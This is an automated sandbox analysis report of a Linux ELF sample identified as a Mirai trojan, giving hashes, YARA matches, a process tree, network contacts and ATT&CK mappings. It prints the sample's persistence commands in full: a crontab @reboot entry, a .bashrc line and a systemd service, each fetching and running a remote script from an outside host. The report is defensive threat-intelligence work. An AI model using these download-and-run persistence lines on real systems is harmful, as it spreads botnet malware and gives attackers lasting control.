Loading Joe Sandbox Report ...

Edit tour

Linux Analysis Report
i686.elf

Overview

General Information

Sample name:i686.elf
Analysis ID:1558940
MD5:ec6e587f931b314683abe573d5d9bc2a
SHA1:dd2a580e000eb5662b4fb4df5918e9779673bb90
SHA256:e1b71400f50e1e8a099dc9311c317c57e42e2310d1e0002353d115c736b2b0a7
Tags:elfuser-abuse_ch
Infos:

Detection

Score:72
Range:0 - 100
Whitelisted:false

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Executes the "crontab" command typically for achieving persistence
Machine Learning detection for sample
Modifies the '.bashrc' or '.bash_profile' file typically for persisting actions
Sample tries to persist itself using cron
Creates hidden files and/or directories
Detected non-DNS traffic on DNS port
Executes commands using a shell command-line interpreter
Executes the "chmod" command used to modify permissions
Executes the "systemctl" command used for controlling the systemd system and service manager
Found strings indicative of a multi-platform dropper
Reads the 'hosts' file potentially containing internal network hosts
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable
Sample has stripped symbol table
Tries to connect to HTTP servers, but all servers are down (expired dropper behavior)
Uses the "uname" system call to query kernel version information (possible evasion)
Yara signature match

Classification

Joe Sandbox version:41.0.0 Charoite
Analysis ID:1558940
Start date and time:2024-11-20 00:56:13 +01:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 4m 41s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:default
Sample name:i686.elf
Detection:MAL
Classification:mal72.troj.linELF@0/4@31/0
  • Excluded domains from analysis (whitelisted): 14.2.168.192.in-addr.arpa
Command:/tmp/i686.elf
PID:5495
Exit Code:0
Exit Code Info:
Killed:False
Standard Output:
we kinda rocking ngl
Standard Error:
  • system is lnxubuntu20
  • i686.elf (PID: 5495, Parent: 5414, MD5: ec6e587f931b314683abe573d5d9bc2a) Arguments: /tmp/i686.elf
    • i686.elf New Fork (PID: 5496, Parent: 5495)
      • i686.elf New Fork (PID: 5497, Parent: 5496)
      • i686.elf New Fork (PID: 5500, Parent: 5496)
      • i686.elf New Fork (PID: 5501, Parent: 5496)
      • i686.elf New Fork (PID: 5502, Parent: 5496)
      • sh (PID: 5502, Parent: 5496, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "(crontab -l ; echo \"@reboot /bin/bash -c \"/bin/wget http://serverip/bins/bins.sh; chmod +x bins.sh; sh bins.sh; /bin/curl -k -L --output bins.sh http://serverip/bins/bins.sh; chmod +x bins.sh; sh bins.sh\"\") | crontab -"
        • sh New Fork (PID: 5503, Parent: 5502)
          • sh New Fork (PID: 5505, Parent: 5503)
          • crontab (PID: 5505, Parent: 5503, MD5: 66e521d421ac9b407699061bf21806f5) Arguments: crontab -l
          • sh New Fork (PID: 5506, Parent: 5503)
          • chmod (PID: 5506, Parent: 5503, MD5: 739483b900c045ae1374d6f53a86a279) Arguments: chmod +x bins.sh
          • sh New Fork (PID: 5507, Parent: 5503)
          • sh (PID: 5507, Parent: 5503, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh bins.sh
          • sh New Fork (PID: 5508, Parent: 5503)
          • curl (PID: 5508, Parent: 5503, MD5: add6bc2195e82c55985ccf49fd4048e6) Arguments: /bin/curl -k -L --output bins.sh http://serverip/bins/bins.sh
          • sh New Fork (PID: 5511, Parent: 5503)
          • chmod (PID: 5511, Parent: 5503, MD5: 739483b900c045ae1374d6f53a86a279) Arguments: chmod +x bins.sh
        • sh (PID: 5503, Parent: 5502, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh bins.sh
        • sh New Fork (PID: 5504, Parent: 5502)
        • crontab (PID: 5504, Parent: 5502, MD5: 66e521d421ac9b407699061bf21806f5) Arguments: crontab -
      • i686.elf New Fork (PID: 5512, Parent: 5496)
      • sh (PID: 5512, Parent: 5496, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "/bin/systemctl enable bot"
        • sh New Fork (PID: 5513, Parent: 5512)
        • systemctl (PID: 5513, Parent: 5512, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: /bin/systemctl enable bot
  • systemd New Fork (PID: 5516, Parent: 5515)
  • snapd-env-generator (PID: 5516, Parent: 5515, MD5: 3633b075f40283ec938a2a6a89671b0e) Arguments: /usr/lib/systemd/system-environment-generators/snapd-env-generator
  • cleanup
SourceRuleDescriptionAuthorStrings
i686.elfLinux_Trojan_Mirai_268aac0bunknownunknown
  • 0x59cf:$a: 24 18 0F B7 44 24 20 8B 54 24 1C 83 F9 01 8B 7E 0C 89 04 24 8B
i686.elfLinux_Trojan_Mirai_0cb1699cunknownunknown
  • 0x5982:$a: DB 8B 4C 24 0C 8B 54 24 08 83 F9 01 76 10 0F B7 02 83 E9 02 83
i686.elfLinux_Trojan_Mirai_3a85a418unknownunknown
  • 0x5447:$a: 01 D8 66 C1 C8 08 C1 C8 10 66 C1 C8 08 66 83 7C 24 2C FF 89
i686.elfLinux_Trojan_Mirai_2e3f67a9unknownunknown
  • 0x17c2:$a: 53 83 EC 04 0F B6 74 24 14 8B 5C 24 18 8B 7C 24 20 0F B6 44
  • 0x1822:$a: 53 83 EC 04 0F B6 74 24 14 8B 5C 24 18 8B 7C 24 20 0F B6 44
i686.elfLinux_Trojan_Mirai_88de437funknownunknown
  • 0x8462:$a: 24 08 8B 4C 24 04 85 D2 74 0D 31 C0 89 F6 C6 04 08 00 40 39 D0
Click to see the 1 entries
SourceRuleDescriptionAuthorStrings
5495.1.0000000008048000.0000000008058000.r-x.sdmpLinux_Trojan_Mirai_268aac0bunknownunknown
  • 0x59cf:$a: 24 18 0F B7 44 24 20 8B 54 24 1C 83 F9 01 8B 7E 0C 89 04 24 8B
5495.1.0000000008048000.0000000008058000.r-x.sdmpLinux_Trojan_Mirai_0cb1699cunknownunknown
  • 0x5982:$a: DB 8B 4C 24 0C 8B 54 24 08 83 F9 01 76 10 0F B7 02 83 E9 02 83
5495.1.0000000008048000.0000000008058000.r-x.sdmpLinux_Trojan_Mirai_3a85a418unknownunknown
  • 0x5447:$a: 01 D8 66 C1 C8 08 C1 C8 10 66 C1 C8 08 66 83 7C 24 2C FF 89
5495.1.0000000008048000.0000000008058000.r-x.sdmpLinux_Trojan_Mirai_2e3f67a9unknownunknown
  • 0x17c2:$a: 53 83 EC 04 0F B6 74 24 14 8B 5C 24 18 8B 7C 24 20 0F B6 44
  • 0x1822:$a: 53 83 EC 04 0F B6 74 24 14 8B 5C 24 18 8B 7C 24 20 0F B6 44
5495.1.0000000008048000.0000000008058000.r-x.sdmpLinux_Trojan_Mirai_88de437funknownunknown
  • 0x8462:$a: 24 08 8B 4C 24 04 85 D2 74 0D 31 C0 89 F6 C6 04 08 00 40 39 D0
Click to see the 7 entries
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: i686.elfReversingLabs: Detection: 31%
Source: i686.elfJoe Sandbox ML: detected
Source: i686.elfString: /cmdline/wget/tftp/curl/reboot/libbin//dev/watchdog/dev/misc/watchdogi686->unknown%d/bin/busybox/bin/sh/var/SofiatelnetdQh
Source: i686.elfString: /bin/bash -c "/bin/wget http://serverip/bins/bins.sh; chmod +x bins.sh; sh bins.sh; /bin/curl -k -L --output bins.sh http://serverip/bins/bins.sh; chmod +x bins.sh; sh bins.sh"
Source: i686.elfString: j2go/proc/net/tcp5.188.230.23137.18.73.94167.235.128.15168.191.23.13445.195.74.233141.94.21.7118.220.154.2118.210.151.8537.187.153.12745.195.74.1970123456789ABCDEF(crontab -l ; echo "@reboot %s") | crontab -/bin/bash -c "/bin/wget http://serverip/bins/bins.sh; chmod +x bins.sh; sh bins.sh; /bin/curl -k -L --output bins.sh http://serverip/bins/bins.sh; chmod +x bins.sh; sh bins.sh"%s/.bashrc
Source: .bashrc.13.drString: /bin/bash -c "/bin/wget http://serverip/bins/bins.sh; chmod +x bins.sh; sh bins.sh; /bin/curl -k -L --output bins.sh http://serverip/bins/bins.sh; chmod +x bins.sh; sh bins.sh"
Source: bot.service.13.drString: ExecStart=/bin/bash -c "/bin/wget http://serverip/bins/bins.sh; chmod +x bins.sh; sh bins.sh; /bin/curl -k -L --output bins.sh http://serverip/bins/bins.sh; chmod +x bins.sh; sh bins.sh"
Source: global trafficTCP traffic: 192.168.2.14:45156 -> 8.8.8.8:53
Source: global trafficTCP traffic: 192.168.2.14:45158 -> 8.8.8.8:53
Source: global trafficTCP traffic: 192.168.2.14:45154 -> 8.8.8.8:53
Source: global trafficTCP traffic: 192.168.2.14:45150 -> 8.8.8.8:53
Source: global trafficTCP traffic: 192.168.2.14:45160 -> 8.8.8.8:53
Source: /bin/curl (PID: 5508)Reads hosts file: /etc/hostsJump to behavior
Source: global trafficTCP traffic: 192.168.2.14:46540 -> 185.125.190.26:443
Source: unknownTCP traffic detected without corresponding DNS query: 185.125.190.26
Source: unknownTCP traffic detected without corresponding DNS query: 185.125.190.26
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficDNS traffic detected: DNS query: host.zopz-api.com
Source: global trafficDNS traffic detected: DNS query: motd.ubuntu.com
Source: global trafficDNS traffic detected: DNS query: daisy.ubuntu.com
Source: tmp.LpIanm.23.drString found in binary or memory: http://serverip/bins/bins.sh
Source: bot.service.13.drString found in binary or memory: http://serverip/bins/bins.sh;
Source: unknownNetwork traffic detected: HTTP traffic on port 46540 -> 443

System Summary

barindex
Source: i686.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_268aac0b Author: unknown
Source: i686.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_0cb1699c Author: unknown
Source: i686.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_3a85a418 Author: unknown
Source: i686.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_2e3f67a9 Author: unknown
Source: i686.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_88de437f Author: unknown
Source: i686.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_cc93863b Author: unknown
Source: 5495.1.0000000008048000.0000000008058000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_268aac0b Author: unknown
Source: 5495.1.0000000008048000.0000000008058000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_0cb1699c Author: unknown
Source: 5495.1.0000000008048000.0000000008058000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_3a85a418 Author: unknown
Source: 5495.1.0000000008048000.0000000008058000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_2e3f67a9 Author: unknown
Source: 5495.1.0000000008048000.0000000008058000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_88de437f Author: unknown
Source: 5495.1.0000000008048000.0000000008058000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_cc93863b Author: unknown
Source: 5496.1.0000000008048000.0000000008058000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_268aac0b Author: unknown
Source: 5496.1.0000000008048000.0000000008058000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_0cb1699c Author: unknown
Source: 5496.1.0000000008048000.0000000008058000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_3a85a418 Author: unknown
Source: 5496.1.0000000008048000.0000000008058000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_2e3f67a9 Author: unknown
Source: 5496.1.0000000008048000.0000000008058000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_88de437f Author: unknown
Source: 5496.1.0000000008048000.0000000008058000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_cc93863b Author: unknown
Source: Initial sampleString containing 'busybox' found: /bin/busybox
Source: Initial sampleString containing 'busybox' found: /cmdline/wget/tftp/curl/reboot/libbin//dev/watchdog/dev/misc/watchdogi686->unknown%d/bin/busybox/bin/sh/var/SofiatelnetdQh
Source: ELF static info symbol of initial sample.symtab present: no
Source: i686.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_268aac0b reference_sample = 49c94d184d7e387c3efe34ae6f021e011c3046ae631c9733ab0a230d5fe28ead, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 9c581721bf82af7dc6482a2c41af5fb3404e01c82545c7b2b29230f707014781, id = 268aac0b-c5c7-4035-8381-4e182de91e32, last_modified = 2021-09-16
Source: i686.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_0cb1699c reference_sample = fc8741f67f39e7409ab2c6c62d4f9acdd168d3e53cf6976dd87501833771cacb, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 6e44c68bba8c9fb53ac85080b9ad765579f027cabfea5055a0bb3a85b8671089, id = 0cb1699c-9a08-4885-aa7f-0f1ee2543cac, last_modified = 2021-09-16
Source: i686.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_3a85a418 reference_sample = 86a43b39b157f47ab12e9dc1013b4eec0e1792092d4cef2772a21a9bf4fc518a, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 554aff5770bfe8fdeae94f5f5a0fd7f7786340a95633433d8e686af1c25b8cec, id = 3a85a418-2bd9-445a-86cb-657ca7edf566, last_modified = 2021-09-16
Source: i686.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_2e3f67a9 reference_sample = fc8741f67f39e7409ab2c6c62d4f9acdd168d3e53cf6976dd87501833771cacb, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 6a06815f3d2e5f1a7a67f4264953dbb2e9d14e5f3486b178da845eab5b922d4f, id = 2e3f67a9-6fd5-4457-a626-3a9015bdb401, last_modified = 2021-09-16
Source: i686.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_88de437f reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = c19eb595c2b444a809bef8500c20342c9f46694d3018e268833f9b884133a1ea, id = 88de437f-9c98-4e1d-96c0-7b433c99886a, last_modified = 2021-09-16
Source: i686.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_cc93863b reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = f3ecd30f0b511a8e92cfa642409d559e7612c3f57a1659ca46c77aca809a00ac, id = cc93863b-1050-40ba-9d02-5ec9ce6a3a28, last_modified = 2022-01-26
Source: 5495.1.0000000008048000.0000000008058000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_268aac0b reference_sample = 49c94d184d7e387c3efe34ae6f021e011c3046ae631c9733ab0a230d5fe28ead, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 9c581721bf82af7dc6482a2c41af5fb3404e01c82545c7b2b29230f707014781, id = 268aac0b-c5c7-4035-8381-4e182de91e32, last_modified = 2021-09-16
Source: 5495.1.0000000008048000.0000000008058000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_0cb1699c reference_sample = fc8741f67f39e7409ab2c6c62d4f9acdd168d3e53cf6976dd87501833771cacb, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 6e44c68bba8c9fb53ac85080b9ad765579f027cabfea5055a0bb3a85b8671089, id = 0cb1699c-9a08-4885-aa7f-0f1ee2543cac, last_modified = 2021-09-16
Source: 5495.1.0000000008048000.0000000008058000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_3a85a418 reference_sample = 86a43b39b157f47ab12e9dc1013b4eec0e1792092d4cef2772a21a9bf4fc518a, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 554aff5770bfe8fdeae94f5f5a0fd7f7786340a95633433d8e686af1c25b8cec, id = 3a85a418-2bd9-445a-86cb-657ca7edf566, last_modified = 2021-09-16
Source: 5495.1.0000000008048000.0000000008058000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_2e3f67a9 reference_sample = fc8741f67f39e7409ab2c6c62d4f9acdd168d3e53cf6976dd87501833771cacb, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 6a06815f3d2e5f1a7a67f4264953dbb2e9d14e5f3486b178da845eab5b922d4f, id = 2e3f67a9-6fd5-4457-a626-3a9015bdb401, last_modified = 2021-09-16
Source: 5495.1.0000000008048000.0000000008058000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_88de437f reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = c19eb595c2b444a809bef8500c20342c9f46694d3018e268833f9b884133a1ea, id = 88de437f-9c98-4e1d-96c0-7b433c99886a, last_modified = 2021-09-16
Source: 5495.1.0000000008048000.0000000008058000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_cc93863b reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = f3ecd30f0b511a8e92cfa642409d559e7612c3f57a1659ca46c77aca809a00ac, id = cc93863b-1050-40ba-9d02-5ec9ce6a3a28, last_modified = 2022-01-26
Source: 5496.1.0000000008048000.0000000008058000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_268aac0b reference_sample = 49c94d184d7e387c3efe34ae6f021e011c3046ae631c9733ab0a230d5fe28ead, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 9c581721bf82af7dc6482a2c41af5fb3404e01c82545c7b2b29230f707014781, id = 268aac0b-c5c7-4035-8381-4e182de91e32, last_modified = 2021-09-16
Source: 5496.1.0000000008048000.0000000008058000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_0cb1699c reference_sample = fc8741f67f39e7409ab2c6c62d4f9acdd168d3e53cf6976dd87501833771cacb, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 6e44c68bba8c9fb53ac85080b9ad765579f027cabfea5055a0bb3a85b8671089, id = 0cb1699c-9a08-4885-aa7f-0f1ee2543cac, last_modified = 2021-09-16
Source: 5496.1.0000000008048000.0000000008058000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_3a85a418 reference_sample = 86a43b39b157f47ab12e9dc1013b4eec0e1792092d4cef2772a21a9bf4fc518a, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 554aff5770bfe8fdeae94f5f5a0fd7f7786340a95633433d8e686af1c25b8cec, id = 3a85a418-2bd9-445a-86cb-657ca7edf566, last_modified = 2021-09-16
Source: 5496.1.0000000008048000.0000000008058000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_2e3f67a9 reference_sample = fc8741f67f39e7409ab2c6c62d4f9acdd168d3e53cf6976dd87501833771cacb, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 6a06815f3d2e5f1a7a67f4264953dbb2e9d14e5f3486b178da845eab5b922d4f, id = 2e3f67a9-6fd5-4457-a626-3a9015bdb401, last_modified = 2021-09-16
Source: 5496.1.0000000008048000.0000000008058000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_88de437f reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = c19eb595c2b444a809bef8500c20342c9f46694d3018e268833f9b884133a1ea, id = 88de437f-9c98-4e1d-96c0-7b433c99886a, last_modified = 2021-09-16
Source: 5496.1.0000000008048000.0000000008058000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_cc93863b reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = f3ecd30f0b511a8e92cfa642409d559e7612c3f57a1659ca46c77aca809a00ac, id = cc93863b-1050-40ba-9d02-5ec9ce6a3a28, last_modified = 2022-01-26
Source: classification engineClassification label: mal72.troj.linELF@0/4@31/0

Persistence and Installation Behavior

barindex
Source: /bin/sh (PID: 5505)Crontab executable: /usr/bin/crontab -> crontab -lJump to behavior
Source: /bin/sh (PID: 5504)Crontab executable: /usr/bin/crontab -> crontab -Jump to behavior
Source: /tmp/i686.elf (PID: 5496)File written: /root/.bashrcJump to behavior
Source: /usr/bin/crontab (PID: 5504)File: /var/spool/cron/crontabs/tmp.LpIanmJump to behavior
Source: /usr/bin/crontab (PID: 5504)File: /var/spool/cron/crontabs/rootJump to behavior
Source: /tmp/i686.elf (PID: 5496)File: /root/.bashrcJump to behavior
Source: /bin/curl (PID: 5508)Directory: /root/.curlrcJump to behavior
Source: /tmp/i686.elf (PID: 5502)Shell command executed: sh -c "(crontab -l ; echo \"@reboot /bin/bash -c \"/bin/wget http://serverip/bins/bins.sh; chmod +x bins.sh; sh bins.sh; /bin/curl -k -L --output bins.sh http://serverip/bins/bins.sh; chmod +x bins.sh; sh bins.sh\"\") | crontab -"Jump to behavior
Source: /tmp/i686.elf (PID: 5512)Shell command executed: sh -c "/bin/systemctl enable bot"Jump to behavior
Source: /bin/sh (PID: 5506)Chmod executable: /usr/bin/chmod -> chmod +x bins.shJump to behavior
Source: /bin/sh (PID: 5511)Chmod executable: /usr/bin/chmod -> chmod +x bins.shJump to behavior
Source: /bin/sh (PID: 5513)Systemctl executable: /bin/systemctl -> /bin/systemctl enable botJump to behavior
Source: /bin/curl (PID: 5508)Queries kernel information via 'uname': Jump to behavior
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity Information2
Scripting
Valid Accounts1
Scheduled Task/Job
1
Unix Shell Configuration Modification
1
Unix Shell Configuration Modification
1
File and Directory Permissions Modification
OS Credential Dumping1
Security Software Discovery
Remote ServicesData from Local System1
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/Job1
Systemd Service
1
Systemd Service
1
Hidden Files and Directories
LSASS Memory1
File and Directory Discovery
Remote Desktop ProtocolData from Removable Media1
Non-Application Layer Protocol
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAt1
Scheduled Task/Job
1
Scheduled Task/Job
Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive2
Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCron2
Scripting
Login HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
No configs have been found
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Number of created Files
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1558940 Sample: i686.elf Startdate: 20/11/2024 Architecture: LINUX Score: 72 47 host.zopz-api.com 172.111.38.48, 1290, 40012 INCERO-HVVCUS Reserved 2->47 49 185.125.190.26, 443 CANONICAL-ASGB United Kingdom 2->49 51 2 other IPs or domains 2->51 55 Malicious sample detected (through community Yara rule) 2->55 57 Multi AV Scanner detection for submitted file 2->57 59 Machine Learning detection for sample 2->59 10 i686.elf 2->10         started        12 systemd snapd-env-generator 2->12         started        signatures3 process4 process5 14 i686.elf 10->14         started        file6 45 /root/.bashrc, ASCII 14->45 dropped 65 Modifies the '.bashrc' or '.bash_profile' file typically for persisting actions 14->65 18 i686.elf sh 14->18         started        20 i686.elf sh 14->20         started        22 i686.elf 14->22         started        24 2 other processes 14->24 signatures7 process8 process9 26 sh crontab 18->26         started        30 sh sh 18->30         started        32 sh systemctl 20->32         started        file10 43 /var/spool/cron/crontabs/tmp.LpIanm, ASCII 26->43 dropped 61 Sample tries to persist itself using cron 26->61 63 Executes the "crontab" command typically for achieving persistence 26->63 34 sh crontab 30->34         started        37 sh chmod 30->37         started        39 sh sh 30->39         started        41 2 other processes 30->41 signatures11 process12 signatures13 53 Executes the "crontab" command typically for achieving persistence 34->53

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
i686.elf32%ReversingLabsLinux.Backdoor.Mirai
i686.elf100%Joe Sandbox ML
No Antivirus matches
No Antivirus matches
No Antivirus matches
NameIPActiveMaliciousAntivirus DetectionReputation
host.zopz-api.com
172.111.38.48
truefalse
    unknown
    daisy.ubuntu.com
    unknown
    unknownfalse
      high
      motd.ubuntu.com
      unknown
      unknownfalse
        high
        NameSourceMaliciousAntivirus DetectionReputation
        http://serverip/bins/bins.shtmp.LpIanm.23.drfalse
          high
          http://serverip/bins/bins.sh;bot.service.13.drfalse
            high
            • No. of IPs < 25%
            • 25% < No. of IPs < 50%
            • 50% < No. of IPs < 75%
            • 75% < No. of IPs
            IPDomainCountryFlagASNASN NameMalicious
            185.125.190.26
            unknownUnited Kingdom
            41231CANONICAL-ASGBfalse
            172.111.38.48
            host.zopz-api.comReserved
            54540INCERO-HVVCUSfalse
            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
            185.125.190.26mmb9.elfGet hashmaliciousGafgyt, Mirai, OkiruBrowse
              mmb5.elfGet hashmaliciousGafgyt, Mirai, OkiruBrowse
                dvwkja7.elfGet hashmaliciousMiraiBrowse
                  jwwofba5.elfGet hashmaliciousMiraiBrowse
                    qkehusl.elfGet hashmaliciousMiraiBrowse
                      vsbeps.elfGet hashmaliciousMiraiBrowse
                        vkjqpc.elfGet hashmaliciousMiraiBrowse
                          arm6.elfGet hashmaliciousMiraiBrowse
                            Satan.sh4.elfGet hashmaliciousUnknownBrowse
                              yakuza.mips.elfGet hashmaliciousMiraiBrowse
                                No context
                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                INCERO-HVVCUScIhVfU4Bus.elfGet hashmaliciousMiraiBrowse
                                • 172.110.25.149
                                b2bXo6vmDm.exeGet hashmaliciousSystemBCBrowse
                                • 23.29.124.10
                                https://auth-start-treizor.github.io/Get hashmaliciousUnknownBrowse
                                • 23.227.176.186
                                https://ambassadorlimo.comGet hashmaliciousUnknownBrowse
                                • 198.99.138.98
                                https://ambassadorlimo.com/Get hashmaliciousUnknownBrowse
                                • 198.99.138.98
